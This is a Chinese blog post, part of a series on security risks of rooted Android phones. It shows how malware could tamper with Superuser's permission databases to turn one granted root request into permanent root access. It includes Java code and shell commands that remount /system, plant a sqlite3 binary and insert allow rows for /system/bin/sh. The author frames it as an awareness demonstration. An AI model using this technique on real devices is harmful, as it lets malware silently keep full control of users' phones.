android手机root后的安全问题 (三)

最新推荐文章于 2023-01-13 22:31:04 发布
最新推荐文章于 2023-01-13 22:31:04 发布
阅读量512 收藏
点赞数
分类专栏: Android手机root后的安全管理

导读:本文介绍病毒如何篡改superuser,使得用户只是允许病毒请求的一次root权限变成允许病毒永久使用root权限。



继续之前两篇文章写,如果路过的同学有疑问,请先看前两篇

有同学说,你的Fake.apk需要把应用copy到system下才行,这是需要root权限的。如果用户允许了你一次root请求,你当着用户的面copy,那么copy之后,系统会发送广播,告知有新的apk被安装,杀毒软件就会发现你。

是的,这确实是个问题,但是病毒就是病毒,总会想办法让你病倒的,别急。


superuser把数据记录到数据库中,那病毒为什么不去修改你的数据库呢?如果修改成功,那么岂不是永久获得了root权限,以后再也用不着你来批准我了,我自己批准!


很不幸,病毒如果获得了一次root权限,那么上面所说的事情是完全可以做到的。

我们来演示一下,我手机中装有superuser,版本为3.0.7

我还装了一个re管理器


首先,我们打开re管理器,这时候re管理器请求使用root权限,superuser会弹出提示,询问用户是否允许

我们点击允许之前,勾选“记住”,然后允许。

这一步是为了获取:应用获得永久root权限时,应该在superuser数据库插入什么样的数据。


然后我们将数据库导出

/data/data/com.noshufou.android.su/databases下面有两个数据库我们需要关注

su.db

permissions.sqlite

我们以permissions.sqlite为例,下图为表结构:


然后来看看病毒应该如何修改数据


病毒只需要关心几个字段

uid,包名,应用名,exec_uid=0,exec_cmd=/system/bin/sh,allow=1

病毒如何获得自己的包名和应用名,这个大家没什么疑问吧

ActivityManager.RunningAppProcessInfo中含有uid的信息

下面的代码可以获得当前应用的uid


[java]  view plain copy
  1. public static int getUid(Context context,String packageName){  
  2.     ActivityManager activityManager = (ActivityManager) context.getSystemService(Context.ACTIVITY_SERVICE);  
  3.     List<ActivityManager.RunningAppProcessInfo> runningAppProcesses = activityManager.getRunningAppProcesses();  
  4.     int size = runningAppProcesses.size();  
  5.     ActivityManager.RunningAppProcessInfo runningAppProcessInfo = null;  
  6.     for (int i = 0; i < size; i++) {  
  7.         runningAppProcessInfo = runningAppProcesses.get(i);  
  8.         if(packageName.equals(runningAppProcessInfo.processName)){  
  9.             return runningAppProcessInfo.uid;  
  10.         }  
  11.     }  
  12.     return -1;  
  13. }  

好了,这个表已经搞定了,su.db和这个几乎一样,也就不再演示了。


最后的问题是,如何修改手机中的数据库,显然,我们使用sqlite3,但是有的手机居然没有这个问题,所以病毒很可能自己捆绑了一个,然后复制到system/bin或者system/xbin中

sqlite3从哪来?哪都有。。比如你可以从模拟器pull出来一份。


好了,全部搞定了

最终我们分两步

1准备sqlite3这个文件,以防万一


[java]  view plain copy
  1. prepareButton.setOnClickListener(new View.OnClickListener() {  
  2.     public void onClick(View v) {  
  3.         File dataFolder = getFilesDir();  
  4.     File sqlite = new File(dataFolder.getAbsolutePath() + "/sqlite3");  
  5.     copyFile("db/sqlite3", sqlite, mResources);  
  6.     }  
  7. });  


2申请root权限,一旦成功,那就修改数据库


[java]  view plain copy
  1. String sqlUpdateSu = "insert into apps (uid,package,name,exec_uid,exec_cmd,allow,dirty)" +  
  2.                             "values (\""+ uid + "\",\"" + packageName + "\",\"" + name + "\",0,\"/system/bin/sh\",1,0) ";  
  3. String sqlInsertPermissions = "insert into apps (uid,package,name,exec_uid,exec_cmd,allow) " +  
  4.                                                     "values (\""+ uid + "\",\"" + packageName + "\",\"" + name + "\",\"0\",\"/system/bin/sh\",\"1\") ";  
  5.   
  6. String[] commands = {"busybox mount -o remount,rw /system"  
  7.                             ,"ls /system/bin/sqlite3 || ls /system/xbin/sqlite3 || busybox cp /data/data/" + packageName + "/files/sqlite3 /system/xbin/sqlite3 && chmod 777 /system/xbin/sqlite3"  
  8.                     ,"busybox rm /data/data/" + packageName + "/files/sqlite3"  
  9.                     ,"sqlite3 /data/data/com.noshufou.android.su/databases/su.db '" + sqlUpdateSu + "'"  
  10.                     ,"sqlite3 /data/data/com.noshufou.android.su/databases/permissions.sqlite '" + sqlInsertPermissions + "' "};  

执行即可


从此,病毒就脱离你的掌控了,一发不可收拾



结语

由于本博客只是用于演示,所以有些不严密的地方。

比如:首次使用superuser之前,它的数据库的表可能还没有创建,所以有些sql操作可能会失败

我也不打算写个完整的病毒,这样一些人就会想着干一些不干净的事情。仅供学习交流


看来大家每次批准root之后,还要去superuser中的列表看看有没有什么异常才行


请大家不要用root的手机随意下载软件,更不要以任何借口制造任何病毒!


android手机root后的安全问题 (一)

android手机root后的安全问题 (二)

android手机root后的安全问题 (三)

android手机root后的安全问题 (四)



android安全问题(一) 静音拍照与被拍

android安全问题(二) 程序锁

android安全问题(三) 钓鱼程序



转贴请保留以下链接

本人blog地址

http://su1216.iteye.com/

http://blog.csdn.net/su1216/


java_天照
关注
专栏目录
安全风险 - 检测Android设备系统是否已Root
Android、前端、小程序、后端
05-24 1571
在很多app中都禁止root后的手机使用相关app功能,这种场景在金融app、银行app更为常见一些;当然针对root后的手机,我们也可以做出风险提示,告知用户当前设备已root,谨防风险!最近在安全检测中提出了一项那么我们首先要做的就是 AndroidRoot
android手机root后的安全问题 (一)
08-10
NULL 博文链接:https://su1216.iteye.com/blog/1668734
手机root安全
iteye_2439的博客
04-11 295
你是否仍在为手机安全感到困扰?是否担心手机root之后会带来更大的安全隐患?SEAndroid会帮助你解决困扰!             SEAndroid基于NSA(美国国家安全局)开发的SELinux (Security-Enhanced Linux),NSA在Linux社区的帮助下开发了基于Linux的强制访问控制(MAC),在这种访问控制体系的限制下,进程只能访问那些在他的任务中所需要...
android root危险,Android刷机中ROOT是否会留下安全隐患【详解】
weixin_42355204的博客
05-29 548
相信很多手机用户对于刷机都不陌生,大部分还体验过,尤其是偏爱刷系统的发烧友们,对于刷机这件事总是津津乐道并乐此不疲。但是刷机也存在着很大的风险,小编就体验过几次,一不小心就把手机刷成了砖头。早期Android手机用户,特别是那些,对于ROOT这件事情肯定都不会陌生吧?确实,在Android系统的刷机过程中(特别是在刷入一些第方的ROM),ROOT过程是一个必需的前提条件。但对于狂热者而已,刷机几...
安卓ROOT权限,挎包获取database数据app开发
m0_72086332的博客
06-22 604
安卓开发
android 读取本地数据库db文件(Android sqlite),2021华为Android面试真题解
m0_64382743的博客
11-27 1736
content provider SQLite数据库存储 文件存储 今天我们主要说 本地数据库sqlite这种方式,实现读取一个本地数据库db文件的功能。为了方便说明,我举个例子来讲: 我们创建一个本地数据库,里面包含两张表 一个用户表user  一个性别表 gender 要求:1.将用户表中用户查询出来,性别需要显示男女,用listView展示出来。 2.修改 将用户表中  王杰修改为李四 3.增加长按删除功能 非常简单的功能,那么我们实现这个需要做以下几步操作。 1..
Android手机获取root权限并实现关机重启功能的方法
09-04
本文将详细介绍如何为Android手机获取root权限以及如何实现关机和重启功能。 首先,获取root权限是一个复杂的过程,涉及到对Android系统的内核层进行修改。通常,这需要使用专门的工具或服务,如SuperSU、Magisk等...
android手机root检测
07-15
标题提到的"android手机root检测"是指检查Android设备是否已经获取了root权限的过程。这个过程对于应用开发者和安全专家来说尤其重要,因为他们需要确保其应用不会在被root的设备上运行,因为这可能会导致数据泄露或...
Android-root.rar_ROOT_android root_root android
09-24
下面我们将详细探讨Android手机终端上的root用户命令合辑及其用法。 1. **获取Root权限**:首先,获取root权限是整个过程的基础。这通常需要通过第方工具或服务,如Magisk、SuperSU等。每个工具都有其特定的流程...
android 安全讲座第四层 手机Root授权原理细节全解析(3)
weixin_33828101的博客
10-28 246
一、 概述本文介绍了android中获取root权限的方法以及原理,让大家对android 玩家中常说的“越狱”有一个更深层次的认识。二、 Root 的介绍1. Root 的目的可以让我们拥有掌控手机系统的权限,比如删除一些system/app下面的无用软件,更换开关机铃声和动画,拦截状态栏弹出的广告等。2. Root的原理介绍谷歌的android系统管理员用...
android superuser.apk 管理root权限原理分析
dairyman的专栏
10-15 2万+
原文出处:http://blog.163.com/szs121@126/blog/static/109056781201223111390835/ 使用android 手机很多情况下需要root权限,关于root权限获取的原理可以参考以下文章: 1、云中漫步博客:  Android系统root破解原理分析     http://my.unix-center.net/~Simon
Android应用向su申请root权限,以及Superuser进行授权管理的原理浅析
koozxcv的博客
04-11 2万+
最近研究了好几天su+Superuser的源码,感觉大概梳理通了整个大体的思路框架,mark一下。 一.su和Suepruser进行root授权的处理流程 对于su命令行程序在对来自Android应用的Root权限请求处理流程大致如下图所示(因为快要找工作了,为了节约时间花了一副丑到哭的图片): 图中Android应用是申请Root权限的申请者,su命令行程序时Root权限拥有者,因su设
root化对手机什么影响,root手机有影响
weixin_44884047的博客
01-09 2万+
手机获取Root权限后,安全软件就可以向系统请求获取Root权限,一旦安全软件获取Root权限,其就可以查杀手机固件中的顽固病毒木马,彻底清除深层手机病毒,一定程度上可提高手机安全手机root之后,删除了系统的一些重要软件,系统可能会不稳定,比如手机的操作变卡了,或者造成其他一些软件没办法正常地使用,还有可能出现充电慢、发热等等的故障问题,影响使用。手机Root后,很容易被一些流氓软件获取Root权限,从而控制手机,窃取我们的隐私,窃取信息,当我们使用支付宝,淘宝,网银时,可能信息就已经被窃取了!
root开启有什么坏处吗,root打开有什么影响
最新发布
weixin_44884047的博客
01-13 5570
购买手机后,一些系统预装软件根本用不上,而且会加剧手机存储空间的使用,占用不必要的手机运行内存空间,消耗手机电量!当手机获取Root权限后,安全软件就可以向系统请求获取Root权限,一旦安全软件获取Root权限,其就可以查杀手机固件中的顽固病毒木马,彻底清除深层手机病毒,一定程度上可提高手机安全。由于Root后可以消掉通知栏广告,卸载各种应用,禁止软件开机自启等,对不少安卓手机用户来说,Root几乎已经成为必做的工作,而各大网站或论坛上绝大部分所谓的“纯净版”ROM,刷了之后其实就是默认获得ROOT权限。
Android手机Root后的安全问题汇总
移动编程
07-12 454
本帖转自: http://su1216.iteye.com/ http://blog.csdn.net/su1216/ 前提:你有一部已经rootandroid手机,并且手机中有busybox和superuser 写本博客的原因是:有无数用户觉得root没有什么风险,或者风险不会降临到自己头上。这里告诉大家,其实风险就在身边! ...
android root后的好处,全面分析手机root后有什么好处 高端玩机!
weixin_28748205的博客
05-27 6544
手机root是为了手机的最高权限的授权,手机获得了最高权限之后可以对手机进行最高权限的管理。可能刚刚接触安卓手机的朋友还不能真正理解手机为什么要root,其实这个也是看个人,如果小编所说下面的都是你不需要,那你就可以免去root手机的麻烦教程了。手机root好处之一:手机可以删除手机自带系统软件现在很多diy rom或者是应用商定制手机都会自带很多自己不喜欢的手机软件程序,虽然不用可以不点,但是在...
android手机Root全过程
hq222的博客
04-04 2万+
写在前面 现在的android手机想要获取root的最高权限都是非常麻烦的,当然这样也能让手机相对更安全,但是最近公司一个项目其中的部分功能需要获取手机root权限,所以这里就做一个root过程的记录。 以红米6为例,说一下root的过程: BL解锁——>线刷开发版——>获取官方root——>刷入第方 Recovery——> Recovery下安装magisk ...
安装Ubuntu进入启动盘时显示Error:Verification failed :(0X1A)security violation
热门推荐
weixin_50405454的博客
01-29 6万+
安装Ubuntu进入启动盘时显示Error:Verification failed :0X1A security violation问题现象及原因问题现象原因分析问题解决方法及步骤 问题现象及原因 本人的情况为之前已经安装过Ubuntu和windows双系统,直接格式化Ubuntu安装所在硬盘,并清除windows中的Ubuntu的启动项。后来再次安装显示蓝屏。 问题现象 直接出现蓝屏,如下图所示: 点击OK后出现: 原因分析 根据提示可知为Security Violation,即安全问题问题解决
rootAndroid手机的隐秘病毒威胁与防范策略
Android手机root后,安全问题日益突出,尤其是当手机root并拥有BusyBox和Superuser权限时,潜在的风险也随之增大。root用户通常认为没有风险,但实际上,这些操作可能会让手机变得极其脆弱。本文主要关注的是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值